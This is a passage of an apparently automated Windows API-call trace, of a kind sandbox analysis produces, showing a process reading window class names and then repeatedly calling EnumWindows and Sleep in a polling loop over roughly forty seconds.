hWnd=0x10122, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0232.893] GetClassNameA (in: hWnd=0x1011e, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0232.893] GetClassNameA (in: hWnd=0x1011a, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0232.893] GetClassNameA (in: hWnd=0x10118, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0232.893] GetClassNameA (in: hWnd=0x10116, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0232.893] GetClassNameA (in: hWnd=0x10114, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0232.893] GetClassNameA (in: hWnd=0x10178, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0232.893] GetClassNameA (in: hWnd=0x1016a, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0232.893] GetClassNameA (in: hWnd=0x1015a, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0232.893] GetClassNameA (in: hWnd=0x10112, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0232.894] Sleep (dwMilliseconds=0x64) [0233.028] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0233.031] Sleep (dwMilliseconds=0x64) [0233.148] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0233.151] Sleep (dwMilliseconds=0x64) [0233.285] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0233.286] Sleep (dwMilliseconds=0x64) [0233.497] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0233.501] Sleep (dwMilliseconds=0x64) [0233.703] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0233.704] Sleep (dwMilliseconds=0x64) [0233.952] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0233.952] Sleep (dwMilliseconds=0x64) [0234.310] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0234.311] Sleep (dwMilliseconds=0x64) [0234.547] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0234.547] Sleep (dwMilliseconds=0x64) [0234.762] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0234.764] Sleep (dwMilliseconds=0x64) [0234.927] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0234.928] Sleep (dwMilliseconds=0x64) [0235.121] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0235.122] Sleep (dwMilliseconds=0x64) [0235.325] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0235.326] Sleep (dwMilliseconds=0x64) [0235.485] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0235.486] Sleep (dwMilliseconds=0x64) [0235.610] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0235.611] Sleep (dwMilliseconds=0x64) [0235.804] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0235.951] Sleep (dwMilliseconds=0x64) [0236.190] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0236.191] Sleep (dwMilliseconds=0x64) [0236.388] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0236.390] Sleep (dwMilliseconds=0x64) [0236.574] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0236.576] Sleep (dwMilliseconds=0x64) [0236.715] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0236.716] Sleep (dwMilliseconds=0x64) [0236.842] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0236.843] Sleep (dwMilliseconds=0x64) [0237.120] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0237.121] Sleep (dwMilliseconds=0x64) [0237.356] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0237.357] Sleep (dwMilliseconds=0x64) [0237.502] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0237.502] Sleep (dwMilliseconds=0x64) [0237.713] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0237.714] Sleep (dwMilliseconds=0x64) [0237.891] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0237.892] Sleep (dwMilliseconds=0x64) [0238.012] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0238.013] Sleep (dwMilliseconds=0x64) [0238.216] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0238.217] Sleep (dwMilliseconds=0x64) [0238.422] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0238.422] Sleep (dwMilliseconds=0x64) [0238.578] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0238.579] Sleep (dwMilliseconds=0x64) [0238.718] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0238.719] Sleep (dwMilliseconds=0x64) [0238.927] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0238.930] Sleep (dwMilliseconds=0x64) [0239.084] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0239.084] Sleep (dwMilliseconds=0x64) [0239.220] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0239.221] Sleep (dwMilliseconds=0x64) [0239.422] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0239.423] Sleep (dwMilliseconds=0x64) [0239.587] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0239.591] Sleep (dwMilliseconds=0x64) [0239.746] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0239.747] Sleep (dwMilliseconds=0x64) [0239.876] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0239.878] Sleep (dwMilliseconds=0x64) [0240.066] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0240.067] Sleep (dwMilliseconds=0x64) [0240.219] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0240.220] Sleep (dwMilliseconds=0x64) [0240.434] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0240.439] Sleep (dwMilliseconds=0x64) [0240.637] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0240.642] Sleep (dwMilliseconds=0x64) [0240.789] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0240.790] Sleep (dwMilliseconds=0x64) [0240.978] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0240.978] Sleep (dwMilliseconds=0x64) [0241.137] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0241.138] Sleep (dwMilliseconds=0x64) [0241.298] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0241.298] Sleep (dwMilliseconds=0x64) [0241.502] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0241.502] Sleep (dwMilliseconds=0x64) [0241.618] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0241.619] Sleep (dwMilliseconds=0x64) [0241.831] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0241.831] Sleep (dwMilliseconds=0x64) [0241.975] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0241.976] Sleep (dwMilliseconds=0x64) [0242.278] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0242.282] Sleep (dwMilliseconds=0x64) [0242.458] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0242.459] Sleep (dwMilliseconds=0x64) [0242.662] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0242.666] Sleep (dwMilliseconds=0x64) [0242.828] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0242.829] Sleep (dwMilliseconds=0x64) [0243.002] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0243.003] Sleep (dwMilliseconds=0x64) [0243.188] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0243.190] Sleep (dwMilliseconds=0x64) [0243.374] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0243.375] Sleep (dwMilliseconds=0x64) [0243.547] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0243.548] Sleep (dwMilliseconds=0x64) [0243.722] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0243.723] Sleep (dwMilliseconds=0x64) [0243.897] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0243.897] Sleep (dwMilliseconds=0x64) [0244.064] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0244.066] Sleep (dwMilliseconds=0x64) [0244.207] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0244.207] Sleep (dwMilliseconds=0x64) [0244.311] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0244.312] Sleep (dwMilliseconds=0x64) [0244.470] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0244.471] Sleep (dwMilliseconds=0x64) [0244.625] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0244.626] Sleep (dwMilliseconds=0x64) [0244.780] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0244.781] Sleep (dwMilliseconds=0x64) [0244.963] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0244.965] Sleep (dwMilliseconds=0x64) [0245.171] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0245.172] Sleep (dwMilliseconds=0x64) [0245.318] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0245.320] Sleep (dwMilliseconds=0x64) [0245.497] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0245.498] Sleep (dwMilliseconds=0x64) [0245.629] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0245.630] Sleep (dwMilliseconds=0x64) [0245.798] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0245.800] Sleep (dwMilliseconds=0x64) [0245.971] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0245.972] Sleep (dwMilliseconds=0x64) [0246.130] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0246.134] Sleep (dwMilliseconds=0x64) [0246.329] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0246.330] Sleep (dwMilliseconds=0x64) [0246.514] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0246.515] Sleep (dwMilliseconds=0x64) [0246.702] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0246.703] Sleep (dwMilliseconds=0x64) [0246.818] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0246.819] Sleep (dwMilliseconds=0x64) [0247.017] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0247.018] Sleep (dwMilliseconds=0x64) [0247.188] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0247.190] Sleep (dwMilliseconds=0x64) [0247.296] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0247.298] Sleep (dwMilliseconds=0x64) [0247.453] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0247.454] Sleep (dwMilliseconds=0x64) [0247.782] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0247.783] Sleep (dwMilliseconds=0x64) [0248.060] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0248.062] Sleep (dwMilliseconds=0x64) [0248.278] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0248.280] Sleep (dwMilliseconds=0x64) [0248.560] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0248.562] Sleep (dwMilliseconds=0x64) [0248.906] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0248.908] Sleep (dwMilliseconds=0x64) [0249.111] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0249.112] Sleep (dwMilliseconds=0x64) [0249.280] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0249.281] Sleep (dwMilliseconds=0x64) [0249.423] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0249.424] Sleep (dwMilliseconds=0x64) [0249.589] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0249.594] Sleep (dwMilliseconds=0x64) [0249.765] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0249.766] Sleep (dwMilliseconds=0x64) [0249.938] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0249.940] Sleep (dwMilliseconds=0x64) [0250.172] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0250.173] Sleep (dwMilliseconds=0x64) [0250.340] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0250.346] Sleep (dwMilliseconds=0x64) [0250.469] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0250.470] Sleep (dwMilliseconds=0x64) [0250.606] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0250.607] Sleep (dwMilliseconds=0x64) [0250.750] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0250.750] Sleep (dwMilliseconds=0x64) [0250.905] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0250.907] Sleep (dwMilliseconds=0x64) [0251.048] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0251.049] Sleep (dwMilliseconds=0x64) [0251.220] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0251.220] Sleep (dwMilliseconds=0x64) [0251.373] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0251.374] Sleep (dwMilliseconds=0x64) [0251.498] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0251.499] Sleep (dwMilliseconds=0x64) [0251.669] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0251.674] Sleep (dwMilliseconds=0x64) [0251.872] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0251.877] Sleep (dwMilliseconds=0x64) [0252.064] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0252.066] Sleep (dwMilliseconds=0x64) [0252.216] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0252.218] Sleep (dwMilliseconds=0x64) [0252.330] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0252.331] Sleep (dwMilliseconds=0x64) [0252.500] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0252.502] Sleep (dwMilliseconds=0x64) [0252.683] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0252.684] Sleep (dwMilliseconds=0x64) [0252.835] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0252.838] Sleep (dwMilliseconds=0x64) [0253.010] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0253.011] Sleep (dwMilliseconds=0x64) [0253.305] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0253.305] Sleep (dwMilliseconds=0x64) [0253.505] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0253.507] Sleep (dwMilliseconds=0x64) [0253.778] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0253.779] Sleep (dwMilliseconds=0x64) [0253.926] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0253.927] Sleep (dwMilliseconds=0x64) [0254.045] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0254.046] Sleep (dwMilliseconds=0x64) [0254.199] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0254.201] Sleep (dwMilliseconds=0x64) [0254.389] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0254.389] Sleep (dwMilliseconds=0x64) [0254.562] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0254.564] Sleep (dwMilliseconds=0x64) [0254.784] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0254.785] Sleep (dwMilliseconds=0x64) [0254.945] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0254.948] Sleep (dwMilliseconds=0x64) [0255.093] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0255.093] Sleep (dwMilliseconds=0x64) [0255.246] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0255.247] Sleep (dwMilliseconds=0x64) [0255.416] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0255.422] Sleep (dwMilliseconds=0x64) [0255.574] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0255.579] Sleep (dwMilliseconds=0x64) [0255.735] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0255.736] Sleep (dwMilliseconds=0x64) [0255.875] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0255.877] Sleep (dwMilliseconds=0x64) [0256.111] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0256.112] Sleep (dwMilliseconds=0x64) [0256.318] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0256.319] Sleep (dwMilliseconds=0x64) [0256.697] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0256.701] Sleep (dwMilliseconds=0x64) [0256.866] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0256.867] Sleep (dwMilliseconds=0x64) [0257.110] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0257.111] Sleep (dwMilliseconds=0x64) [0257.313] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0257.314] Sleep (dwMilliseconds=0x64) [0257.467] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0257.468] Sleep (dwMilliseconds=0x64) [0257.742] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0257.743] Sleep (dwMilliseconds=0x64) [0257.896] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0257.896] Sleep (dwMilliseconds=0x64) [0258.036] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0258.037] Sleep (dwMilliseconds=0x64) [0258.200] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0258.204] Sleep (dwMilliseconds=0x64) [0258.384] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0258.388] Sleep (dwMilliseconds=0x64) [0258.579] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0258.580] Sleep (dwMilliseconds=0x64) [0258.704] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0258.705] Sleep (dwMilliseconds=0x64) [0258.831] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0258.832] Sleep (dwMilliseconds=0x64) [0258.997] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0259.001] Sleep (dwMilliseconds=0x64) [0259.179] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0259.180] Sleep (dwMilliseconds=0x64) [0259.351] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0259.353] Sleep (dwMilliseconds=0x64) [0259.591] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0259.592] Sleep (dwMilliseconds=0x64) [0259.731] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0259.732] Sleep (dwMilliseconds=0x64) [0259.857] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0259.858] Sleep (dwMilliseconds=0x64) [0260.030] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0260.032] Sleep (dwMilliseconds=0x64) [0260.158] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0260.159] Sleep (dwMilliseconds=0x64) [0260.296] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0260.297] Sleep (dwMilliseconds=0x64) [0260.486] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0260.487] Sleep (dwMilliseconds=0x64) [0260.623] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0260.625] Sleep (dwMilliseconds=0x64) [0260.783] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0260.784] Sleep (dwMilliseconds=0x64) [0260.958] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0260.959] Sleep (dwMilliseconds=0x64) [0261.157] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0261.158] Sleep (dwMilliseconds=0x64) [0261.304] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0261.306] Sleep (dwMilliseconds=0x64) [0261.471] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0261.472] Sleep (dwMilliseconds=0x64) [0261.631] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0261.642] Sleep (dwMilliseconds=0x64) [0261.809] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0261.811] Sleep (dwMilliseconds=0x64) [0261.944] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0261.946] Sleep (dwMilliseconds=0x64) [0262.099] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0262.101] Sleep (dwMilliseconds=0x64) [0262.263] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0262.264] Sleep (dwMilliseconds=0x64) [0262.380] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0262.381] Sleep (dwMilliseconds=0x64) [0262.545] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0262.546] Sleep (dwMilliseconds=0x64) [0262.797] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0262.799] Sleep (dwMilliseconds=0x64) [0262.924] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0262.925] Sleep (dwMilliseconds=0x64) [0263.125] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0263.126] Sleep (dwMilliseconds=0x64) [0263.299] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0263.300] Sleep (dwMilliseconds=0x64) [0263.454] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0263.456] Sleep (dwMilliseconds=0x64) [0263.559] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0263.561] Sleep (dwMilliseconds=0x64) [0263.799] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0263.800] Sleep (dwMilliseconds=0x64) [0264.078] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0264.081] Sleep (dwMilliseconds=0x64) [0264.297] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0264.299] Sleep (dwMilliseconds=0x64) [0264.419] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0264.420] Sleep (dwMilliseconds=0x64) [0264.569] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0264.570] Sleep (dwMilliseconds=0x64) [0264.777] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0264.779] Sleep (dwMilliseconds=0x64) [0265.015] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0265.017] Sleep (dwMilliseconds=0x64) [0265.169] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0265.171] Sleep (dwMilliseconds=0x64) [0265.356] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0265.358] Sleep (dwMilliseconds=0x64) [0265.598] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0265.600] Sleep (dwMilliseconds=0x64) [0265.788] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0265.790] Sleep (dwMilliseconds=0x64) [0265.984] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0265.985] Sleep (dwMilliseconds=0x64) [0266.156] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0266.157] Sleep (dwMilliseconds=0x64) [0266.275] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0266.275] Sleep (dwMilliseconds=0x64) [0266.411] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0266.413] Sleep (dwMilliseconds=0x64) [0266.577] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0266.578] Sleep (dwMilliseconds=0x64) [0266.694] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0266.695] Sleep (dwMilliseconds=0x64) [0266.861] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0266.862] Sleep (dwMilliseconds=0x64) [0267.028] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0267.030] Sleep (dwMilliseconds=0x64) [0267.165] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0267.166] Sleep (dwMilliseconds=0x64) [0267.345] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0267.347] Sleep (dwMilliseconds=0x64) [0267.528] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0267.532] Sleep (dwMilliseconds=0x64) [0267.638] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0267.638] Sleep (dwMilliseconds=0x64) [0267.905] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0267.907] Sleep (dwMilliseconds=0x64) [0268.106] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0268.108] Sleep (dwMilliseconds=0x64) [0268.264] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0268.264] Sleep (dwMilliseconds=0x64) [0268.378] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0268.379] Sleep (dwMilliseconds=0x64) [0268.528] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0268.529] Sleep (dwMilliseconds=0x64) [0268.589] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0268.589] Sleep (dwMilliseconds=0x64) [0268.639] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0268.640] Sleep (dwMilliseconds=0x64) [0268.684] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0268.686] Sleep (dwMilliseconds=0x64) [0268.731] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0268.732] Sleep (dwMilliseconds=0x64) [0268.780] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0268.782] Sleep (dwMilliseconds=0x64) [0268.842] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0268.843] Sleep (dwMilliseconds=0x64) [0268.903] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0268.905] Sleep (dwMilliseconds=0x64) [0269.061] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0269.062] Sleep (dwMilliseconds=0x64) [0269.125] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0269.127] Sleep (dwMilliseconds=0x64) [0269.236] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0269.237] Sleep (dwMilliseconds=0x64) [0269.298] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0269.299] Sleep (dwMilliseconds=0x64) [0269.334] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0269.334] Sleep (dwMilliseconds=0x64) [0269.340] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0269.341] Sleep (dwMilliseconds=0x64) [0269.361] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0269.362] Sleep (dwMilliseconds=0x64) [0269.406] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0269.408] Sleep (dwMilliseconds=0x64) [0269.499] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0269.500] Sleep (dwMilliseconds=0x64) [0269.594] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0269.595] Sleep (dwMilliseconds=0x64) [0269.689] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0269.690] Sleep (dwMilliseconds=0x64) [0269.774] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0269.775] Sleep (dwMilliseconds=0x64) [0269.842] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0269.843] Sleep (dwMilliseconds=0x64) [0269.928] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0269.929] Sleep (dwMilliseconds=0x64) [0270.055] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0270.056] Sleep (dwMilliseconds=0x64) [0270.208] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0270.209] Sleep (dwMilliseconds=0x64) [0270.315] EnumWindows 